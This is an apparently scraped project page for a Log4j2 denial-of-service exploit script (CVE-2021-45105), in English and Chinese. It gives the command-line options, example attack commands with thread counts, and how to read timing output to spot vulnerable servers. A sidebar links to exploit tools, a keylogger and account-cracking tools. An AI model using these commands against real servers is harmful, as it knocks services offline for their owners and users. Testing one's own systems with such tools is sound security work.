log4j2 dos exploit,CVE-2021-45105 exploit,Denial of Service poc

Last update: Aug 13, 2022

Overview

说明 about

author: 我超怕的

blog: https://www.cnblogs.com/iAmSoScArEd/

github: https://github.com/iAmSOScArEd/

date: 2021-12-20

log4j2 dos exploit

log4j2 dos 漏洞利用脚本

CVE-2021-45105 Exploit

CVE-2021-45105 利用脚本

利用方式 how to use

English：

Log4j2_dos.py -u <url> -m <method> -d <params> -H <header> -l <loop> -t <thread>

-u,--url    	 attack target
-m,--method    http method, only get and post. default is get.
-d,--data   	 get or post params, json format like:{\"username\":\"\"}
-H,--header    request header, json format like:{\"user-agent\":\"\"}
-l,--loop    	 payload loop times (or length),default 100.it is determine where is the params, example get param max length or post param max length or request header max length
-t,--thread    attack thread. default is 0, just request once.

usage:
Log4j2_dos.py -u http://url.com/ -d {\"username\":\"\"}
Log4j2_dos.py -u http://url.com/ -d {\"username\":\"\"} -l 500 -t 100
Log4j2_dos.py -u http://url.com/ -m post -d {\"username\":\"\"} -l 500
Log4j2_dos.py -u http://url.com/ -m post -H {\"user-agent\":\"\"} -l 500 -t 100
Log4j2_dos.py -u http://url.com/ -m post -d {\"username\":\"\"} -H {\"user-agent\":\"\"} -l 500

Output format：

[+] normal time:0.11111

[+] attack time:2.00000

if attack time -normal time>1 or something，it maybe exist vulnerability，can use -t param set attack thread.

中文：

 Log4j2_dos.py -u <url> -m <method> -d <params> -H <header> -l <loop> -t <thread>
 
-u,--url   		 攻击目标
-m,--method    默认为get，http方式，仅支持get和post
-d,--data   	 get或post请求参数，json格式，如：{\"username\":\"\"}
-H,--header    请求头, json格式， 如：{\"user-agent\":\"\"}
-l,--loop    	 默认为100，payload循环长度,根据参数在不同的位置，设置不同的数值，如请求头最大允许长度、get最大长度、post最大长度
-t,--thread    默认为0,表示仅请求一次，攻击线程.。

输出格式：

[+] normal time:0.11111

[+] attack time:2.00000

如果attack time延迟很大，说明漏洞存在，可以利用-t参数设置攻击线程

免责声明

请勿用于非法用途，仅供学习参考。任何违法行为与本人无关。

蹩脚英语，没用翻译，将就看。

By：我超怕的

log4j2 dos exploit,CVE-2021-45105 exploit,Denial of Service poc

Related tags

Overview

说明 about

利用方式 how to use

English：

中文：

免责声明

Owner

Python APK Reverser & Patcher Tool

A repository to detect the ARP spoofing in any devices and prevent Man in the Middle(MITM) attack using Python3

PyPasser is a Python library for bypassing reCaptchaV3 only by sending 2 requests.

Proof of concept for CVE-2021-31166, a remote HTTP.sys use-after-free triggered remotely.

Simple Python 3 script to detect the "Log4j" Java library vulnerability (CVE-2021-44228) for a list of URL with multithreading

Python implementation for PrintNightmare using standard Impacket.

zip-brute Zip File Password Cracking with Using Password List

This is a multi-password‌ cracking tool that can help you hack facebook accounts very quickly

2021hvv漏洞汇总

Ducky Script is the payload language of Hak5 gear.

Salesforce Recon and Exploitation Toolkit

Log4jScanner is a Log4j Related CVEs Scanner, Designed to Help Penetration Testers to Perform Black Box Testing on given subdomains.

TCP/UDP port scanner on python, usong scapy and multiprocessin

Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user

Python implementation for CVE-2021-42278 (Active Directory Privilege Escalation)

Bandit is a tool designed to find common security issues in Python code.

Threat Intel Platform for T-POTs

Discord-keylogger - Discord keylogger With Python

Glass是一款针对资产列表的快速指纹识别工具，通过调用Fofa/ZoomEye/Shodan/360等api接口

🔍 IRIS: An open-source intelligence framework